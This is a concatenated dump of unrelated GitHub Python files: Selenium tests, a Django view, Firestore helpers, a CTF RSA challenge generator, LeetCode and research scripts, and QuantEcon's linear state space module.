detailQueryPage.secondPage_endDate_button.click()\n enddates = detailQueryPage.secondPage_endDate_table_buttons\n ninedates = []\n for j in range(0, len(enddates)):\n if enddates[j].get_attribute(\"title\") == \"2016年1月9日\":\n ninedates.append(enddates[j])\n ninedates[1].click()\n\n '''交易类型'''\n detailQueryPage.secondPage_trsType_index.click()\n trstypes = detailQueryPage.secondPage_trsType_indexs\n for k in range(0,len(trstypes)):\n if \"结息\" in trstypes[k].text:\n trstypes[k].click()\n break\n detailQueryPage.secondPage_query_button.click()\n sleep(1)\n\n '''结果列表取第一条点击详情'''\n dolinks = detailQueryPage.list_dolinks\n dolinks[0].click()\n sleep(1)\n '''对话框取值'''\n assert detailQueryPage.list_msgs[0].text == '8888 8880 3184 5595'\n\n\n\nif __name__ == '__main__':\n pytest.main([\"-v\", \"-s\", \"test_detailQuery.py\"])\n","repo_name":"zhangq0813/pyautoTest-qywy","sub_path":"test_dir/test_detailQuery.py","file_name":"test_detailQuery.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"17617342557","text":"import os\nfrom sys import argv\n\n\n# this function return correct solution value from graph in txt\n\ndef good_solution(name):\n with open(name, 'r') as file:\n line = file.readline()\n return line.split()[-1]\n\n\n''' in this function we give as argument function to test, and we have \n true as result if function return the same result as we have in graph file,\n or false in other cases.'''\n\n\ndef testing(function):\n directory = argv\n directory = str(directory)\n directory = directory[2:-9] + \"Graf\"\n for i in os.listdir(directory):\n if int(good_solution(\"Graf/\" + i)) != int(function(\"Graf/\" + i)):\n good_solution(\"Graf/\" + i)\n return False\n return True\n","repo_name":"sumo-slonik/Algorytmy_grafowe","sub_path":"lab1/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"21256073141","text":"def fake_bin(x):\n \n new_lst = ''\n for num in x:\n if int(num) < 5:\n new_lst += '0'\n else:\n new_lst += '1'\n\n return new_lst\n \n\n# best practice return ''.join('0' if c < '5' else '1' for c in x)\n\nprint(fake_bin('588832199'))","repo_name":"SoULyDeV/My-Training","sub_path":"old_train.py/fake_binary.py","file_name":"fake_binary.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"4965626905","text":"# \"\"\"\n# Main module\n# \"\"\"\nimport logging\nimport signal\nimport sys\nimport server.websocket_server\n\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\n\n\ndef setup_logging():\n logging.basicConfig(format='%(message)s', level=\"INFO\")\n\n\ndef run():\n \"\"\"\n Main function of the app that start the server\n \"\"\"\n port = 8765\n setup_logging()\n\n if len(sys.argv) > 1:\n port = int(sys.argv[1])\n\n ws_server = server.websocket_server.WebsocketServer(port)\n ws_server.run_forever()\n\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"userlea/userlea-BatchExplorer","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"27653783537","text":"from Crypto.Util.number import bytes_to_long, getPrime\r\nfrom random import randint\r\nfrom gmpy2 import powmod\r\n\r\np = getPrime(2048)\r\nq = getPrime(2048)\r\nN = p*q\r\nPhi = (p-1)*(q-1)\r\ndef get_enc_key(N,Phi):\r\n e = getPrime(N)\r\n if Phi % e == 0:\r\n return get_enc_key(N, Phi)\r\n else:\r\n return e\r\ne1 = get_enc_key(randint(10, 12), Phi)\r\ne2 = get_enc_key(randint(10, 12), Phi)\r\n\r\nfr = open(r\"./base64\", \"rb\")#flag is in this file\r\nf1 = open(r\"./HUB1\", \"wb\")\r\nf2 = open(r\"./HUB2\", \"wb\")\r\nbase64 = fr.read(255)\r\nf1.write(\"%d\\n%d\\n\" % (N, e1))\r\nf2.write(\"%d\\n%d\\n\" % (N, e2))\r\nwhile len(base64)>0:\r\n pt = bytes_to_long(base64)\r\n ct1 = powmod(pt, e1, N)\r\n ct2 = powmod(pt, e2, N)\r\n f1.write(\"\\n%d\" % ct1)\r\n f2.write(\"\\n%d\" % ct2)\r\n base64 = fr.read(255)\r\nfr.close()\r\nf1.close()\r\nf2.close()\r\n\r\n","repo_name":"yuanxpy/buuctf","sub_path":"buu_crypto/RSA & what--rsa算法+循环共模攻击+base64隐写术/rsawhat/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"4576604059","text":"#######################\n# GAS IN SSCS: XCLASS #\n#######################\n\n# Merge independent fitting, temperature line fitting and ro-vib line fitting.\n\n\n###################################################################################################\n# load data\n###################################################################################################\n\nexecfile(os.path.join(scriptdir, '700.info.py'))\nexecfile(os.path.join(scriptdir, '720.XCLASS.helpers.py'))\nSSCs = QTable.read(os.path.join(subprojectdir,'SSCs.fits'))\n\ndata_I = fnunpickle(os.path.join(mandir,'line_intensity_data.pickle'))\ndata_N = fnunpickle(os.path.join(Xfinaldir, 'data.pickle'))\ndata_T = fnunpickle(os.path.join(tempdir, 'temperature_data.pickle'))\ndata_vib = fnunpickle(os.path.join(vibdir, 'vibrational_data.pickle'))\n\ntemperature_species = fnunpickle(os.path.join(tempdir, 'temperature_species.pickle'))\nvibrational_species = fnunpickle(os.path.join(vibdir, 'vibrational_species.pickle'))\n\n\n###################################################################################################\n# merge data\n###################################################################################################\n\ndata_XCLASS = copy.deepcopy(data_N)\ndata_Gauss = copy.deepcopy(data_I)\n\nfor SSC in tqdm(SSCs):\n for specie in data_XCLASS[SSC['num']].keys():\n\n if specie in temperature_species:\n # for temperature specie fits:\n # T fitted\n # N fitted\n # w (semi-)fixed\n # v fixed\n # tau fitted implicitely\n for q in ['temperature','column density','peak opacity','integrated opacity']:\n data_XCLASS[SSC['num']][specie][q] = data_T[SSC['num']][specie][q]\n\n if specie in vibrational_species:\n # for temperature specie fits:\n # T fixed at 300K\n # N fitted\n # w (semi-)fixed\n # v fixed\n # tau fitted implicitely\n for q in ['temperature','column density','peak opacity','integrated opacity']:\n data_XCLASS[SSC['num']][specie][q] = data_vib[SSC['num']][specie][q]\n\nos.system('mkdir -p '+resultsdir)\nfnpickle(data_XCLASS, os.path.join(resultsdir, 'data_XCLASS.pickle'))\nfnpickle(data_Gauss, os.path.join(resultsdir, 'data_Gauss.pickle'))\n\n\n###################################################################################################\n# filter bad fits\n###################################################################################################\n\n# bad fits are most easily identified by way too low column densities\n# remove a fit if its column density is lower than 10% of the median\n# replace these values with the sample median to keep the data structure equal in size, update in place\n\nfor s, ss in tqdm(data_XCLASS.items()):\n for spx, data in ss.items():\n for comp in np.arange(len(data['velocity']['median'])):\n\n # get indeces of bad fits: column density\n all = data['column density']['all'][comp]\n median = data['column density']['median'][comp]\n bad_cd = np.append( np.where(all < 0.1*median)[0], np.where(all > 10*median)[0] )\n\n if not spx=='CO;v=0' or (s in ['1','2'] and spx=='CS;v=0'):\n # get indeces of bad fits: linewidth\n all = data['linewidth']['all'][comp]\n median = data['linewidth']['median'][comp]\n bad_lw = np.append( np.where(all > 0.*median+59.)[0], np.where(all < 0.*median+11.)[0] )\n if len(bad_lw) > 50:\n bad_lw = np.array([], dtype='int64')\n else:\n bad_lw = np.array([], dtype='int64')\n\n bad_idx = np.append(bad_cd, bad_lw)\n\n # for all quantities\n for q,quantity in data.items():\n # get good statistics (without the bad values)\n good_p16, good_median, good_p84 = np.percentile( np.delete(quantity['all'][comp],bad_idx), (16,50,84) )\n quantity['median'][comp] = good_median\n quantity['16th'][comp] = good_p16\n quantity['84th'][comp] = good_p84\n # replace bad values with good median\n for bi in bad_idx:\n # quantity['all'][comp][bi] = good_median\n data_XCLASS[s][spx][q]['all'][comp][bi] = good_median\n\n\nfnpickle(data_XCLASS, os.path.join(resultsdir, 'data_XCLASS.pickle'))\n\n\n###################################################################################################\n#\n###################################################################################################\n","repo_name":"GiantMolecularCloud/NGC253-ISM-in-SSCs","sub_path":"760.merge_XCLASS.py","file_name":"760.merge_XCLASS.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"1412071825","text":"from django.views.generic import TemplateView, View\nfrom django.shortcuts import render\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.mixins import UserPassesTestMixin, LoginRequiredMixin\nfrom social.forms import PostForm\nfrom social.models import Post, Comment\n\n#LoginRequiredMixin nos sirve para si no esta logueado te redirija a la pagina de login.\nclass HomeView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n logged_in_user=request.user\n posts = Post.objects.all()\n form = PostForm()\n \n context={\n 'posts': posts,\n 'form': form,\n \n\n }\n return render(request, 'pages/index.html', context)\n \n def post(self, request,*args, **kwargs):\n logged_in_user=request.user\n posts = Post.objects.all()\n form =PostForm(request.POST)\n \n if form.is_valid():\n new_post = form.save(commit=False)\n new_post.author = logged_in_user\n new_post.save()\n \n \n context={\n 'posts': posts,\n 'form':form,\n }\n return render(request, 'pages/index.html', context)","repo_name":"FrancoArguello/social_network","sub_path":"social_network/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"7354018207","text":"'''\n@author:noc\n@time:2020年3月21日\n@url:https://leetcode-cn.com/problems/water-and-jug-problem/\n'''\n\nimport math\n\n'''\n题解1: 贝祖定理:ax + by = c,若 a b 都为整数,那么 gcd(a, b)对于任意的一组 x,y的整数解,则 c一定是 gcd(a, b)的倍数,反过同样,c不为它的倍数,则无整数解。\n同样对于此题的要求是:\n装满任意一个水壶\n清空任意一个水壶\n从一个水壶向另外一个水壶倒水,直到装满或者倒空\n不可能存在两个桶同时为 空 满的状态,所以水的变化只能是 多了 x 或 y, 少了 x或y。根据这一特性,我们可以求 ax + by = z的解了。\n时间复杂度:O(logN) 取决于辗转相除法所求组大公因数的时间\n空间复杂度:O(1)\n\n题解2:利用深度搜索(dfs)来一次检查每一种情况,一旦找到某一种情况符合条件,则返回结果.\n根据允许的条件可以看出,一种可以有如下操作:\n1 向x中灌满水\n2 向y中灌满水\n3 向x中倒完水\n4 向y中倒完水\n5 把x的水倒向y里,直到装满或者倒空\n6 把y的水倒向x里,直到装满或者倒空\n那么可以用,remain_x remain_y 来表示x和y里水的总量。用栈来模拟dfs的递归操作,用seen来存放所有已经检查过的情况\n时间复杂度:O(xy) \n空间复杂度: O(xy)\n'''\n\nclass Solution:\n def canMeasureWater(self, x, y, z):\n if x + y < z: return False\n if x == 0 or y == 0:\n return z == 0 or x + y == z\n return z % math.gcd(x, y) == 0\n\n\n # seen = set()\n # stack = [(0, 0)]\n # while stack:\n # remain_x, remain_y = stack.pop()\n # if remain_x == z or remain_y == z or remain_x + remain_y == z:\n # return True\n # if (remain_x, remain_y) in seen:\n # continue\n # seen.add((remain_x, remain_y))\n # stack.append((remain_x, y)) # y中倒满水\n # stack.append((x, remain_y)) # x中到满水\n # stack.append((0, remain_y)) # x倒空水\n # stack.append((remain_x, 0)) # y倒空水\n # # 解释一下两部,因为一个壶的水倒进另一个壶里的终止条件为 倒满或者倒空,我们用 min()来判断 被倒的壶中空的量和倒的壶水的余量谁更少\n # # 如果 倒的壶中的水为 1,被倒的壶中空的水量为 2,当水倒完后,被倒的壶肯定没有装满\n # stack.append((remain_x - min(remain_x, y - remain_y), remain_y + min(remain_x, y - remain_y))) # x倒进y里,直到倒满或者倒空\n # stack.append((remain_x + min(remain_y, x - remain_x), remain_y - min(remain_y, x - remain_x))) # y倒进x里,直到倒满或者倒空\n return False\n\nif __name__ == '__main__':\n x, y, z = 3, 5, 4\n out = Solution().canMeasureWater(x, y, z)\n print(out)","repo_name":"NonCover/-","sub_path":"leetcode.365.水壶问题.py","file_name":"leetcode.365.水壶问题.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"} +{"seq_id":"9545483365","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# boxlayout.py\nimport sys\nfrom PyQt4 import QtGui, QtCore\nclass Help(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n self.setWindowTitle('CowLog Help')\n self.setWindowIcon(QtGui.QIcon('icons/help.png'))\n ok = QtGui.QPushButton(\"Close\", self)\n #ok.setMaximumWidth(80)\n self.connect(ok, QtCore.SIGNAL('clicked()'), QtCore.SLOT('hide()'))\n #title = QtGui.QLabel(self)\n #title.setText('

Main help

')\n about = QtGui.QTextBrowser(self)\n #about.setAlignment(QtCore.Qt.AlignCenter)\n about.setMinimumSize(400, 400)\n #CowLog help\n #about.setHtml(\"\"\"\"\"\")\n about.setSource(QtCore.QUrl('manual.html'))\n \n grid = QtGui.QGridLayout(self)\n grid.setSpacing(7)\n #grid.addWidget(title, 1, 1)\n grid.addWidget(about, 2, 0, 5, 3)\n grid.addWidget(ok, 7, 1)\n self.show()\n\n","repo_name":"PigLardLord/BAS","sub_path":"source/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"73013050502","text":"import sys\nsys.path.append('..')\nimport my_parser as p\nimport heapq\n\nlines = p.input_as_lines('inputs/inp.txt')\n\nG = [[int(el) for el in line] for line in lines]\nR = len(G)\nC = len(G[0])\n\n# north, east, south, west\nDR = [-1, 0, 1, 0]\nDC = [0, 1, 0, -1]\n\n\ndef get_score(distances):\n \"\"\"Note Got lucky with the end point being further than 4 points from a\n turn otherwise would have had to change the score calculation.\"\"\"\n min_dist = float('inf')\n for k, v in distances.items():\n if k[0] == R - 1 and k[1] == C - 1:\n if v < min_dist:\n min_dist = v\n return min_dist\n\n\ndef get_dirs(part, d, con):\n dirs = [0, 1, 2, 3]\n dirs.remove((d + 2) % 4)\n if part == 1:\n\n if con == 3:\n dirs.remove(d)\n else:\n if con == 10:\n dirs.remove(d)\n elif con < 4:\n dirs = [d]\n\n return dirs\n\n\nfor part in [1, 2]:\n distances = {}\n visited = set()\n pq = [(0, 0, 0, 1, 0), (0, 0, 0, 2, 0)] # (row, col, dir, consecutive, distance)\n while pq:\n l, r, c, d, con = heapq.heappop(pq)\n\n if (r, c, d, con) in distances:\n if l < distances[(r, c, d, con)]:\n distances[(r, c, d, con)] = l\n else:\n continue\n else:\n distances[(r, c, d, con)] = l\n\n dirs = get_dirs(part, d, con)\n\n for nd in dirs:\n nr = r + DR[nd]\n nc = c + DC[nd]\n\n if nr < 0 or nc < 0 or nr >= R or nc >= C:\n continue\n\n nl = l + G[nr][nc]\n if nd == d:\n heapq.heappush(pq, (nl, nr, nc, nd, con + 1))\n else:\n heapq.heappush(pq, (nl, nr, nc, nd, 1))\n\n\n print(get_score(distances))\n\n","repo_name":"PietPjotr/advent-of-code","sub_path":"2023/day_17/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"28793517361","text":"import configparser\nimport os\n\nfrom dataclasses import dataclass, field\nfrom titr import CONFIG_FILE\n\n\n@dataclass\nclass Config:\n outlook_account: str = \"\"\n default_category: int = 0\n default_task: str = \"\"\n calendar_name: str = \"\"\n skip_event_names: list[str] = field(default_factory=list)\n skip_event_status: list[int] = field(default_factory=list)\n category_list: dict = field(default_factory=dict)\n task_list: dict = field(default_factory=dict)\n skip_all_day_events: bool = True\n max_duration: float = 9\n deep_work_goal: float = 0\n incidental_tasks: list[str] = field(default_factory=list)\n source_file: str = \"\"\n\n\ndef create_default_config():\n \"\"\"Create a default configuration file\"\"\"\n # Ensure we don't accidentally overwrite config\n if os.path.isfile(CONFIG_FILE):\n raise FileExistsError(f\"Config file '{CONFIG_FILE}' already exists!\")\n config = configparser.ConfigParser(allow_no_value=True)\n user_email: str = input(\"Enter your email to connect to outlook: \")\n config[\"outlook_options\"] = {\n \"email\": user_email,\n \"calendar_name\": \"Calendar\",\n \"# skip events with given status codes, comma separated list\": None,\n \"# 0 = free\": None,\n \"# 1 = tentative\": None,\n \"# 2 = busy\": None,\n \"# 3 = out of office\": None,\n \"# 4 = working elsewhere\": None,\n \"skip_event_status\": \"0, 3\",\n \"skip_all_day_events\": \"yes\",\n \"# use comma separated list of calendar event names to be skipped\": None,\n \"skip_event_names\": \"\",\n }\n config[\"general_options\"] = {\n \"max_entry_duration\": \"9\",\n \"default_category\": \"2\",\n \"default_task\": \"d\",\n \"deep_work_goal\": \"300\",\n }\n config[\"categories\"] = {\n 2: \"Deep Work\",\n 3: \"Email\",\n 4: \"Meetings\",\n }\n config[\"tasks\"] = {\n \"i\": \"Incidental\",\n \"d\": \"Default Task\",\n }\n config[\"incidental_tasks\"] = {\n \"keys\": \"i\",\n }\n config_path: str = os.path.dirname(CONFIG_FILE)\n if not os.path.exists(config_path): # pragma: no cover\n os.mkdir(config_path)\n with open(CONFIG_FILE, \"w\") as config_file_handle:\n config.write(config_file_handle)\n\n return CONFIG_FILE\n\n\ndef load_config(config_file=CONFIG_FILE) -> Config:\n \"\"\"Load and validate configuration options.\"\"\"\n # look for a config file in the working directory\n # if it doesn't exist, create it with some default options\n if not os.path.isfile(config_file):\n config_file = create_default_config()\n config = Config()\n parser = configparser.ConfigParser()\n parser.read(config_file)\n for key in parser[\"categories\"]:\n try:\n cat_key = int(key)\n except ValueError as err:\n print(f\"Warning: Skipped category key {key} in {config_file}: {err}\")\n continue\n config.category_list[cat_key] = parser[\"categories\"][key]\n for key in parser[\"tasks\"]:\n if len(key) > 1:\n print(f\"Warning: Skipped task key {key} in {config_file}: len > 1.\")\n continue\n if key.isdigit():\n print(f\"Warning: Skipped task key {key} in {config_file}: Digit\")\n continue\n config.task_list[key] = parser[\"tasks\"][key]\n\n config.source_file = config_file\n config.default_task = parser[\"general_options\"][\"default_task\"]\n config.incidental_tasks = parser[\"incidental_tasks\"][\"keys\"].split(\", \")\n config.incidental_tasks = list(map(str.strip, config.incidental_tasks))\n if config.default_task not in config.task_list.keys():\n print(\n \"Warning: Default tasks '\",\n config.default_task,\n \"' not found in \",\n config_file,\n )\n config.default_task = list(config.task_list.keys())[0]\n\n # TODO: Error handling for default category as not an int\n config.default_category = int(parser[\"general_options\"][\"default_category\"])\n if config.default_category not in config.category_list.keys():\n config.default_category = int(list(config.category_list.keys())[0])\n print(\n \"Warning: Default category '\",\n config.default_category,\n \"'not found in \",\n config_file,\n )\n\n # TODO: Error handling\n config.max_duration = float(parser[\"general_options\"][\"max_entry_duration\"])\n config.deep_work_goal = float(parser[\"general_options\"][\"deep_work_goal\"])\n\n config.outlook_account = parser[\"outlook_options\"][\"email\"]\n config.calendar_name = parser[\"outlook_options\"][\"calendar_name\"]\n config.skip_event_names = [\n event.strip() for event in parser[\"outlook_options\"][\"skip_event_names\"].split(\",\")\n ]\n # TODO: Error handling\n config.skip_event_status = [\n int(status) for status in parser[\"outlook_options\"][\"skip_event_status\"].split(\",\")\n ]\n config.skip_all_day_events = parser.getboolean(\"outlook_options\", \"skip_all_day_events\")\n # print(f\"Loaded config from {config_file=}\")\n\n return config\n","repo_name":"blairfrandeen/titr","sub_path":"src/titr/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"} +{"seq_id":"8431634994","text":"from django.urls import path\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('armurerie/', views.armory, name=\"armory\"),\r\n path('armurerie/iframe/', views.armoryIframe, name=\"armory_iframe\"),\r\n path('armes/', views.weapons, name=\"weapons\"),\r\n path('armes//', views.weapon, name=\"weapon\"),\r\n path('add/weapon', views.addWeapon, name=\"add_weapon\"),\r\n path('armes/edit/', views.editWeapon, name=\"edit_weapon\"),\r\n path('armes/delete/', views.deleteWeapon, name=\"delete_weapon\"),\r\n path('armes/confirm/', views.confirmWeapon, name=\"confirm_weapon\"),\r\n\r\n path('armures/', views.armors, name=\"armors\"),\r\n path('armures//', views.armor, name=\"armor\"),\r\n path('add/armure', views.addArmor, name=\"add_armor\"),\r\n path('armures/edit/', views.editArmor, name=\"edit_armor\"),\r\n path('armures/delete/', views.deleteArmor, name=\"delete_armor\"),\r\n path('armures/confirm/', views.confirmArmor, name=\"confirm_armor\"),\r\n\r\n path('addSheet/', views.addStuffSheet, name=\"add_stuffSheet\"),\r\n path('confirmSheet/', views.confirmStuffSheet,\r\n name=\"confirm_stuffSheet\"),\r\n path('deleteSheet/', views.deleteStuffSheet, name=\"delete_stuffSheet\"),\r\n\r\n path('addCustom/', views.addCustomSheet, name=\"add_customSheet\"),\r\n path('confirmCustom/', views.confirmCustomSheet,\r\n name=\"confirm_customSheet\"),\r\n path('deleteCustom/', views.deleteCustomSheet, name=\"delete_customSheet\"),\r\n]\r\n\r\n\r\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\r\n","repo_name":"y-janssens/Sigfroi","sub_path":"equipement/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"8"} +{"seq_id":"43753145272","text":"# -*- coding: utf-8 -*-\n'''\n控制器:主要作用为对整个流程的控制,如何采样,如何根据得到的结构以及结果进行下一次采样\n'''\nimport random\nfrom Transformation import *\nclass RandomController(object):\n\t\"\"\"随机控制器,随机选择采样\"\"\"\n\tdef __init__(self, action_list):\n\t\tsuper(RandomController, self).__init__()\n\t\tself.action_list = action_list\n\n\tdef stage1_select_action(self, input_model):\n\t\tregular_name_list = ['regular_1', 'regular_2', 'regular_3', 'regular_4', 'regular_5']\n\t\tstage_action_list = self.action_list['stage_1']\n\t\taction = random.choice(stage_action_list)\n\t\tif action == 'delete_decoder' and input_model.decoder:\n\t\t\treturn delete_decoder(input_model)\n\t\tblock = random.choice(regular_name_list)\n\t\tif not action == 'delete_decoder':\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\tnew_model = locals()[action](block,input_model)\n\t\t\t\t\tbreak\n\t\t\t\texcept AssertionError:\n\t\t\t\t\tblock = random.choice(regular_name_list)\n\t\t\t\t\tcontinue\n\t\treturn new_model\n\n\t@staticmethod\n\tdef stage2_select_action(input_model):\n\t\toutput_name = input_model.output_name\n\t\tfirst_node = random.choice(output_name[0:-2])\n\t\tfirst_node_index = output_name.index(first_node)\n\t\tsecond_node = random.choice(output_name[first_node_index:-1])\n\t\toutput_channel = input_model.output_channel\n\t\tfirst_node_spatial_size = output_channel[first_node_index][0]\n\t\tfirst_node_channel_size = output_channel[first_node_index][1]\n\t\tsecond_node_spatial_size = output_channel[second_node][0]\n\t\tsecond_node_channel_size = output_channel[second_node][1]\n\t\tif first_node_spatial_size == second_node_spatial_size:\n\t\t\tspatial_action = None\n\t\telif first_node_spatial_size > second_node_spatial_size:\n\t\t\tspatial_action = random.choice(['max','avg','3x3_conv'])\n\t\telse:\n\t\t\tspatial_action = 'up_conv'\n\t\tconnection = random.choice(['add','concat'])\n\t\tchannel_dim = None\n\t\tif connection == 'concat':\n\t\t\tchannel_operation = None\n\t\telse:\n\t\t\tif first_node_channel_size == second_node_channel_size:\n\t\t\t\tchannel_operation = None\n\t\t\telse:\n\t\t\t\tchannel_operation = '1x1_conv'\n\t\t\t\tchannel_dim = second_node_channel_size\n\t\treturn add_connection(input_model,first_node,second_node,connection,spatial_action,channel_operation,channel_dim)\n\n\n\n\n\n\t# def select_action(self,stage,model):\n\t# \tstage_action_list = self.action_list[stage]\n\t# \tif stage == 'stage_1':\n\t# \t\taction = random.choice(stage_action_list)\n\t#\n\t# \tpass\n\n\n\t\t\n","repo_name":"zhengxiawu/efficient_image_to_image_NAS","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"28981924870","text":"class Solution:\n def isAnagram(self, s, t):\n if len(s) != len(t):\n return False\n length = len(s)\n dicts,dictt = {},{}\n for i in range(length):\n if s[i] not in dicts:\n dicts[s[i]] = 0\n if t[i] not in dictt:\n dictt[t[i]] = 0\n dicts[s[i]] += 1\n dictt[t[i]] += 1\n\n return dicts == dictt\n","repo_name":"1019572917/daily","sub_path":"1.26isAnagram242.py","file_name":"1.26isAnagram242.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"9740949524","text":"import firebase_admin\nfrom firebase_admin import firestore\n\ndef init_firestore():\n import firebase_admin\n from firebase_admin import credentials\n from firebase_admin import firestore\n\n # Use a service account.\n cred = credentials.Certificate('service_account.json')\n app = firebase_admin.initialize_app(cred)\n db = firestore.client()\n\ndef read_data(collection_name, doc_name):\n db = firestore.client()\n doc_ref = db.collection(collection_name).document(doc_name)\n doc = doc_ref.get()\n if doc.exists:\n return f'data: {doc.to_dict()}'\n return \"Document does not exist.\"\n\ndef read_alldocs(collection_name):\n db = firestore.client()\n docs = db.collection(collection_name).stream()\n docs_list = []\n for doc in docs:\n docs_list.append(doc.to_dict())\n return docs_list\n\ndef add_data(collection_name, doc_name, data):\n db = firestore.client()\n doc_ref = db.collection(collection_name).document(doc_name)\n doc_ref.set(data)\n\ndef delete_data(collection_name, doc_name):\n db = firestore.client()\n doc_ref = db.collection(collection_name).document(doc_name)\n doc_ref.delete()\n","repo_name":"yukti99/Student-Group-Finder-App","sub_path":"firestore.py","file_name":"firestore.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"16386438429","text":"\"\"\"\nComputes quantities associated with the Gaussian linear state space model.\n\nReferences\n----------\n\nhttps://lectures.quantecon.org/py/linear_models.html\n\n\"\"\"\n\nfrom textwrap import dedent\nimport numpy as np\nfrom numpy.random import multivariate_normal\nfrom scipy.linalg import solve\nfrom numba import jit\nfrom .util import check_random_state\n\n\n@jit\ndef simulate_linear_model(A, x0, v, ts_length):\n r\"\"\"\n This is a separate function for simulating a vector linear system of\n the form\n\n .. math::\n\n x_{t+1} = A x_t + v_t\n\n given :math:`x_0` = x0\n\n Here :math:`x_t` and :math:`v_t` are both n x 1 and :math:`A` is n x n.\n\n The purpose of separating this functionality out is to target it for\n optimization by Numba. For the same reason, matrix multiplication is\n broken down into for loops.\n\n Parameters\n ----------\n A : array_like or scalar(float)\n Should be n x n\n x0 : array_like\n Should be n x 1. Initial condition\n v : np.ndarray\n Should be n x ts_length-1. Its t-th column is used as the time t\n shock :math:`v_t`\n ts_length : int\n The length of the time series\n\n Returns\n --------\n x : np.ndarray\n Time series with ts_length columns, the t-th column being :math:`x_t`\n \"\"\"\n A = np.asarray(A)\n n = A.shape[0]\n x = np.empty((n, ts_length))\n x[:, 0] = x0\n for t in range(ts_length-1):\n # x[:, t+1] = A.dot(x[:, t]) + v[:, t]\n for i in range(n):\n x[i, t+1] = v[i, t] # Shock\n for j in range(n):\n x[i, t+1] += A[i, j] * x[j, t] # Dot Product\n return x\n\n\nclass LinearStateSpace:\n r\"\"\"\n A class that describes a Gaussian linear state space model of the\n form:\n\n .. math::\n\n x_{t+1} = A x_t + C w_{t+1}\n\n y_t = G x_t + H v_t\n\n where :math:`{w_t}` and :math:`{v_t}` are independent and standard normal\n with dimensions k and l respectively. The initial conditions are\n :math:`\\mu_0` and :math:`\\Sigma_0` for :math:`x_0 \\sim N(\\mu_0, \\Sigma_0)`.\n When :math:`\\Sigma_0=0`, the draw of :math:`x_0` is exactly :math:`\\mu_0`.\n\n Parameters\n ----------\n A : array_like or scalar(float)\n Part of the state transition equation. It should be `n x n`\n C : array_like or scalar(float)\n Part of the state transition equation. It should be `n x m`\n G : array_like or scalar(float)\n Part of the observation equation. It should be `k x n`\n H : array_like or scalar(float), optional(default=None)\n Part of the observation equation. It should be `k x l`\n mu_0 : array_like or scalar(float), optional(default=None)\n This is the mean of initial draw and is `n x 1`\n Sigma_0 : array_like or scalar(float), optional(default=None)\n This is the variance of the initial draw and is `n x n` and\n also should be positive definite and symmetric\n\n Attributes\n ----------\n A, C, G, H, mu_0, Sigma_0 : see Parameters\n n, k, m, l : scalar(int)\n The dimensions of x_t, y_t, w_t and v_t respectively\n\n \"\"\"\n\n def __init__(self, A, C, G, H=None, mu_0=None, Sigma_0=None):\n self.A, self.G, self.C = list(map(self.convert, (A, G, C)))\n # = Check Input Shapes = #\n ni, nj = self.A.shape\n if ni != nj:\n raise ValueError(\"Matrix A (shape: %s) needs to be square\" % (self.A.shape))\n if ni != self.C.shape[0]:\n raise ValueError(\"Matrix C (shape: %s) does not have compatible dimensions with A. It should be shape: %s\" % (self.C.shape, (ni,1)))\n self.m = self.C.shape[1]\n self.k, self.n = self.G.shape\n if self.n != ni:\n raise ValueError(\"Matrix G (shape: %s) does not have compatible dimensions with A (%s)\"%(self.G.shape, self.A.shape))\n if H is None:\n self.H = None\n self.l = None\n else:\n self.H = self.convert(H)\n self.l = self.H.shape[1]\n if mu_0 is None:\n self.mu_0 = np.zeros((self.n, 1))\n else:\n self.mu_0 = self.convert(mu_0)\n self.mu_0.shape = self.n, 1\n if Sigma_0 is None:\n self.Sigma_0 = np.zeros((self.n, self.n))\n else:\n self.Sigma_0 = self.convert(Sigma_0)\n\n def __repr__(self):\n return 